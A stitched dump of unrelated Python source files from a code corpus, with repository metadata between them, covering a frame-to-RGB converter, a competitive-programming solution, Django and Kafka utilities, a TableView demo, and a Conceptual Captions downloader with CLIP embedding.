elif len(frame_rgb_data11[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string].append([])
frame_rgb_data11[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data11[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string][y].append(get_block)
made_changes = True
if made_changes:
if spongebob_frame < 135:
with open(f"./ep_{EPISODE_STRING}/rgb_values_1.json", "w") as outfile:
json.dump(frame_rgb_data1, outfile)
elif spongebob_frame < 270:
with open(f"./ep_{EPISODE_STRING}/rgb_values_2.json", "w") as outfile:
json.dump(frame_rgb_data2, outfile)
elif spongebob_frame < 405:
with open(f"./ep_{EPISODE_STRING}/rgb_values_3.json", "w") as outfile:
json.dump(frame_rgb_data3, outfile)
elif spongebob_frame < 540:
with open(f"./ep_{EPISODE_STRING}/rgb_values_4.json", "w") as outfile:
json.dump(frame_rgb_data4, outfile)
elif spongebob_frame < 675:
with open(f"./ep_{EPISODE_STRING}/rgb_values_5.json", "w") as outfile:
json.dump(frame_rgb_data5, outfile)
elif spongebob_frame < 810:
with open(f"./ep_{EPISODE_STRING}/rgb_values_6.json", "w") as outfile:
json.dump(frame_rgb_data6, outfile)
elif spongebob_frame < 945:
with open(f"./ep_{EPISODE_STRING}/rgb_values_7.json", "w") as outfile:
json.dump(frame_rgb_data7, outfile)
elif spongebob_frame < 1080:
with open(f"./ep_{EPISODE_STRING}/rgb_values_8.json", "w") as outfile:
json.dump(frame_rgb_data8, outfile)
elif spongebob_frame < 1215:
with open(f"./ep_{EPISODE_STRING}/rgb_values_9.json", "w") as outfile:
json.dump(frame_rgb_data9, outfile)
elif spongebob_frame < 1350:
with open(f"./ep_{EPISODE_STRING}/rgb_values_10.json", "w") as outfile:
json.dump(frame_rgb_data10, outfile)
else:
with open(f"./ep_{EPISODE_STRING}/rgb_values_11.json", "w") as outfile:
json.dump(frame_rgb_data11, outfile)
print(f"Finished frame: {frame_string_string}")
| 27.1266
| 93
| 0.440509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,689
| 0.149161
|
af6af919b708faefe930ae59ccea70a7cedd960e
| 210
|
py
|
Python
|
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/060/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
def main():
# input
A, B, C = input().split()
# compute
# output
if A[-1]==B[0] and B[-1]==C[0]:
print('YES')
else:
print('NO')
if __name__ == '__main__':
main()
| 13.125
| 35
| 0.438095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 43
| 0.204762
|
af6cc52ba6e57b394d26f12154df2f51b1b57cc5
| 636
|
py
|
Python
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 19
|
2019-11-08T22:50:32.000Z
|
2022-03-14T22:29:21.000Z
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | null | null | null |
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 7
|
2020-06-15T08:03:41.000Z
|
2021-10-01T11:22:58.000Z
|
import unittest
import numpy as np
from src.layers.flatten import Flatten
class TestFlatten(unittest.TestCase):
def test_flatten(self):
batch_size = 10
n_h, n_w, n_c = 32, 32, 3
a_prev = np.random.randn(batch_size, n_h, n_w, n_c)
f = Flatten()
f.init((n_h, n_w, n_c))
self.assertEqual(f.get_output_dim(), n_h * n_w * n_c)
self.assertTupleEqual(f.forward(a_prev, False).shape, (batch_size, n_h * n_w * n_c))
da, _, _ = f.backward(a_prev)
self.assertTupleEqual(da.shape, (batch_size, n_h, n_w, n_c))
np.testing.assert_array_almost_equal(a_prev, da)
| 30.285714
| 92
| 0.641509
| 557
| 0.875786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af6ea05a1f8f073a03f7dff7deddcb7bdfb3a4a9
| 3,976
|
py
|
Python
|
oscar/core/loading.py
|
owad/django-oscar
|
cfa69e37dc9abc97a7aff5c8616da319e1771008
|
[
"BSD-3-Clause"
] | 1
|
2022-03-17T19:26:13.000Z
|
2022-03-17T19:26:13.000Z
|
oscar/core/loading.py
|
aykut/django-oscar
|
ca3629e74ea1e0affc55d3de4e97f523e352d267
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/core/loading.py
|
aykut/django-oscar
|
ca3629e74ea1e0affc55d3de4e97f523e352d267
|
[
"BSD-3-Clause"
] | 1
|
2019-03-23T10:26:02.000Z
|
2019-03-23T10:26:02.000Z
|
from imp import new_module
from django.conf import settings
class AppNotFoundError(Exception):
pass
def import_module(module_label, classes, namespace=None):
u"""
For dynamically importing classes from a module.
Eg. calling import_module('product.models') will search INSTALLED_APPS for
the relevant product app (default is 'oscar.product') and then import the
classes from there. If the class can't be found in the overriding module,
then we attempt to import it from within oscar.
We search the INSTALLED_APPS list to find the appropriate app string and
import that.
This is very similar to django.db.models.get_model although that is only
for loading models while this method will load any class.
"""
# Classes must be specified in order for __import__ to work correctly. It's
# also a good practice
if not classes:
raise ValueError("You must specify the classes to import")
# Arguments will be things like 'product.models' and so we
# we take the first component to find within the INSTALLED_APPS list.
app_name = module_label.rsplit(".", 1)[0]
for installed_app in settings.INSTALLED_APPS:
base_package = installed_app.split(".")[0]
module_name = installed_app.split(".", 2).pop() # strip oscar.apps
try:
# We search the second component of the installed apps
if app_name == module_name:
if base_package == 'oscar':
# Using core module explicitly
return _import_classes_from_module("oscar.apps.%s" % module_label, classes, namespace)
else:
# Using local override - check that requested module exists
local_app = "%s.%s" % (base_package, module_label)
try:
imported_local_mod = __import__(local_app, fromlist=classes)
except ImportError, e:
# Module doesn't exist, fall back to oscar core. This can be tricky
# as if the overriding module has an import error, it will get picked up
# here.
if str(e).startswith("No module named"):
return _import_classes_from_module("oscar.apps.%s" % module_label, classes, namespace)
raise e
# Found overriding module, merging custom classes with core
module = new_module(local_app)
imported_oscar_mod = __import__("oscar.apps.%s" % module_label, fromlist=classes)
for classname in classes:
if hasattr(imported_local_mod, classname):
if namespace:
namespace[classname] = getattr(imported_local_mod, classname)
else:
module.__setattr__(classname, getattr(imported_local_mod, classname))
else:
if namespace:
namespace[classname] = getattr(imported_oscar_mod, classname)
else:
module.__setattr__(classname, getattr(imported_oscar_mod, classname))
return module
except IndexError:
pass
raise AppNotFoundError("Unable to find an app matching %s in INSTALLED_APPS" % (app_name,))
def _import_classes_from_module(module_name, classes, namespace):
imported_module = __import__(module_name, fromlist=classes)
if namespace:
for classname in classes:
namespace[classname] = getattr(imported_module, classname)
return
module = new_module(module_name)
for classname in classes:
setattr(module, classname, getattr(imported_module, classname))
return module
| 46.232558
| 114
| 0.597837
| 43
| 0.010815
| 0
| 0
| 0
| 0
| 0
| 0
| 1,376
| 0.346076
|
af6f367d7cdaed06d634c9db91b020afc6d934e8
| 3,197
|
py
|
Python
|
domba/clis/start.py
|
sofyan48/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | 1
|
2019-07-27T12:17:16.000Z
|
2019-07-27T12:17:16.000Z
|
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
from domba.clis.base import Base
from domba.libs import env_lib
from domba.libs import knot_lib
from domba.libs import kafka_lib
import os
class Start(Base):
"""
usage:
start slave
start master
Command :
Options:
-h --help Print usage
"""
def execute(self):
# knot_lib.utils.check_root()
broker_env = env_lib.utils.get_env_values_broker()
broker = broker_env['broker']+":"+broker_env['port']
topic = broker_env['topic']
group = broker_env['group']
flag = broker_env['flags']
if self.args['slave']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
if self.args['master']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
| 38.987805
| 82
| 0.483891
| 3,057
| 0.956209
| 0
| 0
| 0
| 0
| 0
| 0
| 656
| 0.205192
|
af6febf89f847660f4b9e84d576a390734dbb67d
| 2,214
|
py
|
Python
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | null | null | null |
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2020-08-07T13:04:43.000Z
|
2020-08-10T12:32:46.000Z
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:46:45.000Z
|
2019-12-16T15:46:45.000Z
|
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.tfr_helper as tfr_helper
os.environ["CUDA_VISIBLE_DEVICES"] = ""
tf.enable_eager_execution()
if __name__ == "__main__":
print("run IS2d_triangle")
# prefix = "val"
input_list_name = "lists/TFR_2dt_100k_unsorted_s50_areafix_train.lst"
with open(input_list_name) as fobj:
filename_list = [x.strip("\n") for x in fobj.readlines()]
print("input list hast {} files".format(len(filename_list)))
print("load&batch-test...")
raw_dataset = tf.data.TFRecordDataset(filename_list)
print(raw_dataset)
parsed_dataset = raw_dataset.map(tfr_helper.parse_t2d)
batch_size = 1000
max_batches = 10
parsed_dataset_batched = parsed_dataset.batch(batch_size)
# parsed_dataset_batched = parsed_dataset_batched.repeat(10)
print(parsed_dataset)
counter = 0
number_of_batches = 0
plt.figure()
min_area = 10000
for batch_idx, sample in enumerate(parsed_dataset_batched):
if batch_idx >= max_batches:
break
number_of_batches = batch_idx + 1
points = sample[1]["points"]
# points[batch_sample, point, component]
a_x = points[:, 0, 0]
a_y = points[:, 0, 1]
b_x = points[:, 1, 0]
b_y = points[:, 1, 1]
c_x = points[:, 2, 0]
c_y = points[:, 2, 1]
ab = np.sqrt((a_x - b_x) ** 2 + (a_y - b_y) ** 2)
bc = np.sqrt((b_x - c_x) ** 2 + (b_y - c_y) ** 2)
ca = np.sqrt((c_x - a_x) ** 2 + (c_y - a_y) ** 2)
areas = np.abs((a_x * (b_y - c_y) + b_x * (c_y - a_y) + c_x * (a_y - b_y)) / 2.0)
inner_circle = 2 * areas / (ab + bc + ca)
outer_circle = ab * bc * ca / (4.0 * areas)
min_area = np.minimum(min_area, np.min(areas))
print(areas)
print(inner_circle)
print(outer_circle)
plt.scatter(areas, inner_circle / outer_circle)
# print(a, a.shape)
print("min_area", min_area)
plt.show()
print("{} samples in list: {}".format(number_of_batches * batch_size, input_list_name))
print(" Done.")
print("Finished.")
| 31.183099
| 91
| 0.617435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.158537
|
af71f9e9ddb2979aa18dd52c6ff6dae1a9583788
| 4,090
|
py
|
Python
|
Three-Column-Sortable-TableView.py
|
humberry/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 115
|
2015-03-01T20:22:19.000Z
|
2022-01-23T16:16:48.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 8
|
2015-01-05T10:12:24.000Z
|
2020-08-02T07:43:10.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 37
|
2015-05-10T03:24:33.000Z
|
2022-03-11T04:06:47.000Z
|
# coding: utf-8
import ui, os, datetime
from operator import itemgetter
class MyTableViewDataSource(object):
def __init__(self, row_height):
self.row_height = row_height
self.width = None
def tableview_number_of_rows(self, tableview, section):
return len(tableview.data_source.items)
def tableview_cell_for_row(self, tableview, section, row):
self.width, height = ui.get_screen_size()
cell = ui.TableViewCell()
cell.bounds = (0, 0, self.width, self.row_height)
for i in range(3):
self.make_labels(cell, tableview.data_source.items[row][i], i)
return cell
def make_labels(self, cell, text, pos):
label = ui.Label()
label.border_color = "lightgrey"
label.border_width = 0.5
if pos == 2:
label.text = str(datetime.datetime.fromtimestamp(text))
else:
label.text = str(text)
label.frame = (pos * self.width / 3, 0, self.width / 3, self.row_height)
label.alignment = ui.ALIGN_CENTER
cell.content_view.add_subview(label)
class MyTableView(ui.View):
def __init__(self):
self.dirs = []
self.files = []
self.order = 'asc'
self.active_button = None
self.button_height = 50
self.btn_name = self.make_buttons("Name")
self.btn_size = self.make_buttons("Size")
self.btn_date = self.make_buttons("Date")
self.tv = ui.TableView()
self.tv.row_height = 30
self.tv.data_source = MyTableViewDataSource(self.tv.row_height)
self.get_dir()
self.all_items = self.dirs + self.files
self.tv.data_source.items = self.all_items
self.name = "TableView-Test"
self.tv.allows_selection = False
self.add_subview(self.tv)
self.present("fullscreen")
def make_buttons(self, name):
button = ui.Button()
button.name = name
button.title = name
button.border_color = 'blue'
button.border_width = 1
button.corner_radius = 3
button.background_color = 'white'
button.action = self.btn_action
self.add_subview(button)
return button
def btn_action(self, sender):
names = [self.btn_name.name, self.btn_size.name, self.btn_date.name] #['Name', 'Size', 'Date']
sender_index = names.index(sender.name) #0/1/2
if self.order == 'asc':
self.order = 'desc'
self.all_items = sorted(self.all_items, key=itemgetter(sender_index))
else:
self.order = 'asc'
self.all_items = sorted(
self.all_items, key=itemgetter(sender_index), reverse=True
)
self.tv.data_source.items = self.all_items
self.tv.reload()
def layout(self):
self.tv.reload()
self.btn_name.frame = (
0 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_size.frame = (
1 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_date.frame = (
2 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.tv.frame = (
0,
self.button_height,
self.width,
self.height - self.button_height,
)
def get_dir(self):
path = os.getcwd()
if path == os.path.expanduser("~"):
self.dirs = []
else:
self.dirs = [["..", 0, 0.0]]
self.files = []
for entry in sorted(os.listdir(path)):
full_pathname = path + "/" + entry
if os.path.isdir(full_pathname):
date = os.path.getmtime(full_pathname)
self.dirs.append((entry, "<DIR>", date))
else:
size = os.path.getsize(full_pathname)
date = os.path.getmtime(full_pathname)
self.files.append((entry, size, date))
MyTableView()
| 31.953125
| 103
| 0.55868
| 3,998
| 0.977506
| 0
| 0
| 0
| 0
| 0
| 0
| 154
| 0.037653
|
af7371f20bd26e4f799d725d92aa211ad0557f49
| 668
|
py
|
Python
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | 2
|
2020-10-12T11:33:00.000Z
|
2021-12-20T06:33:54.000Z
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as pl
from matplotlib.colors import LogNorm
fn = '../pozo-steep-vegetated-pcl.npy'
pts = np.load(fn)
x, y = pts[:, 0], pts[:, 1]
ix = (0.2 * (x - x.min())).astype('int')
iy = (0.2 * (y - y.min())).astype('int')
shape = (100, 100)
#xb = np.arange(shape[1]+1)
#yb = np.arange(shape[0]+1)
xb = np.arange(x.min(), x.min()+500, 5)
yb = np.arange(y.min(), y.min()+500, 5)
bins = np.zeros(shape)
for j in range(len(ix)):
bins[iy[j], ix[j]] += 1
cmap = pl.cm.magma_r
norm = LogNorm()
pl.pcolormesh(xb, yb, bins,
cmap = cmap,
#norm = norm,
)
pl.colorbar()
pl.axes().set_aspect('equal')
pl.show()
| 22.266667
| 40
| 0.586826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 117
| 0.17515
|
af747dc207dec3cbffc1da1f8850f8e0ae2ec7ff
| 110
|
py
|
Python
|
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
def figure(nrows=1, ncols=1, figsize=(6,6), dpi=150):
return plt.subplots(nrows, nclos, figsize, dpi=dpi)
| 36.666667
| 55
| 0.690909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af74d606a269a83e28010d18de482c23c6ab0542
| 5,600
|
py
|
Python
|
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Datary sdk Remove Operations File
"""
import os
from urllib.parse import urljoin
from datary.auth import DataryAuth
from datary.operations.limits import DataryOperationLimits
import structlog
logger = structlog.getLogger(__name__)
class DataryRemoveOperation(DataryAuth, DataryOperationLimits):
"""
Datary RemoveOperation module class
"""
def delete_dir(self, wdir_uuid, path, basename):
"""
Delete directory.
-- NOT IN USE --
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
path str path to directory
basename str directory name
================ ============= ====================================
"""
logger.info(
"Delete directory in workdir.",
wdir_uuid=wdir_uuid,
basename=basename,
path=os.path.join(path, basename))
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "delete",
"filemode": 40000,
"basename": path,
"basename": basename}
response = self.request(
url, 'GET', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"Directory has been deleted in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
else:
logger.error(
"Fail to delete Directory in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
def delete_file(self, wdir_uuid, element):
"""
Delete file.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
element Dic element with path & basename
================ ============= ====================================
"""
logger.info(
"Delete file in workdir.",
element=element,
wdir_uuid=wdir_uuid)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {
"action": "remove",
"filemode": 100644,
"basename": element.get('path'),
"basename": element.get('basename')
}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"File has been deleted.",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
else:
logger.error(
"Fail to delete file in workdir",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
def delete_inode(self, wdir_uuid, inode):
"""
Delete using inode.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
inode str directory or file inode.
================ ============= ====================================
"""
logger.info("Delete by inode.", wdir_uuid=wdir_uuid, inode=inode)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "remove", "inode": inode}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info("Element has been deleted using inode.")
else:
logger.error(
"Fail to delete file by inode in workdir",
url=url,
workdir=wdir_uuid,
inode=inode)
def clear_index(self, wdir_uuid):
"""
Clear changes in repo.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
================ ============= ====================================
"""
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
response = self.request(url, 'DELETE', **{'headers': self.headers})
if response:
logger.info("Repo index has been cleared.")
return True
else:
logger.error(
"Fail to clean the workdir index",
url=url,
workdir=wdir_uuid)
return False
| 32.55814
| 78
| 0.411786
| 5,335
| 0.952679
| 0
| 0
| 0
| 0
| 0
| 0
| 2,666
| 0.476071
|
af7521356a79a5c1bee31c5535d67e69471269c6
| 531
|
py
|
Python
|
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | null | null | null |
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | null | null | null |
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | 1
|
2019-03-07T04:30:36.000Z
|
2019-03-07T04:30:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-12 10:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('widgets', '0002_auto_20170612_1201'),
]
operations = [
migrations.AddField(
model_name='widgets',
name='widget_type',
field=models.CharField(blank=True, choices=[('clock', 'Clock'), ('weather', 'Weather')], max_length=2, null=True),
),
]
| 25.285714
| 126
| 0.619586
| 373
| 0.702448
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.299435
|
af76cb63ff7f339b7e7e1d830fd28ab78f3db4d3
| 9,199
|
py
|
Python
|
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
for i in range(2):
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
except BaseException:
is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
except BaseException:
return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
# print(f'BINNEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'BUITEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
caption = caption.strip()
if caption[-1] != '.':
caption = caption + '.'
elif caption[-2] == ' ':
caption = caption[:-2] + '.'
return caption
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
